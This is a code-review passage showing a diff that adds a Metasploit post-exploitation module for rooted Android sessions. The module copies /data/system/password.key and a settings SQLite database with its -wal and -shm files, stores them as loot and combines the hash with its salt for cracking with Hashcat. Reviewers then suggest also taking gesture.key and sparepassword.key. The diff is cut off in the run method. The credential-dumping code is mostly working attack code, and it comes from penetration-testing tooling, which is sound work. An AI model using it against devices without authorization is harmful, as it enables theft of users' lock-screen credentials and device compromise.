modules/post/android/gather/hashdump.rb

```diff
@@ -0,0 +1,160 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'sqlite3'
+require 'fileutils'
+require 'metasploit/framework/hashes/identify'
+
+class MetasploitModule < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Android::Priv
+
+  def initialize(info={})
+    super( update_info( info, {
+        'Name'          => "Android Gather Dump Password Hashes for Android Systems",
+        'Description'   => %q{
+           Post Module to dump the password hashes for Android System. Root is required.
+           To perform this operation, two things are needed.  First, a password.key file
+           is required as this contains the hash but no salt.  Next, a sqlite3 database
+           is needed (with supporting files) to pull the salt from.  Combined, this
+           creates the hash we need.  This can be cracked with Hashcat, mode 5800.
+           Samsung devices only have SHA1 hashes, while most other Android devices
+           also have an MD5 hash.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => ['h00die'],
+        'SessionTypes'  => [ 'meterpreter', 'shell' ],
+        'Platform'      => 'android',
+        'References'    => [
+          ['URL', 'https://www.pentestpartners.com/security-blog/cracking-android-passwords-a-how-to/'],
+          ['URL', 'https://hashcat.net/forum/thread-2202.html'],
+        ],
+      }
+    ))
+  end
+
+  def read_store_sql(location)
+    # we need the .db file, as well as the supporting files .db-shm and .db-wal as they may contain
+    # the values we are looking for
+    db_loot_name = ''
+    file_name = File.basename(location)
+    ['', '-wal', '-shm'].each do |ext|
+      l = location + ext
+      unless file_exist?(l)
+        next
+      end
+      f = file_name + ext
+      data = read_file(l)
+      if data.blank?
+        print_error("Unable to read #{l}")
+        return
+      end
+      print_good("Saved #{f} with length #{data.length}")
+
+      if ext == ''
+        loot_file = store_loot('SQLite3 DB', 'application/x-sqlite3', session, data, f, 'Android database')
+        db_loot_name = loot_file
+        next
+      end
+
+      loot_file = store_loot('SQLite3 DB', 'application/binary', session, data, f, 'Android database')
+
+      # in order for sqlite3 to see the -wal and -shm support files, we have to rename them
+      # we have to do this since the ext is > 3
+      # https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/auxiliary/report.rb#L391
+      new_name = "#{db_loot_name}#{ext}"
+      FileUtils.mv(loot_file, new_name)
+    end
+    SQLite3::Database.new(db_loot_name)
+  end
+
+  def run
+    unless is_root?
+      fail_with Failure::NoAccess, 'This module requires root permissions.'
+    end
+
+    print_status('Attempting to determine unsalted hash.')
+    key_file = '/data/system/password.key'
```

Comment:
I think we could gather the key *after* the hash, and check for /data/system/password.key, /data/system/gesture.key and /data/system/sparepassword.key
Not sure if we need that before landing what's working currently though

Reply:
lets deal with these things later, this is already a lot of code adds and its working pretty good already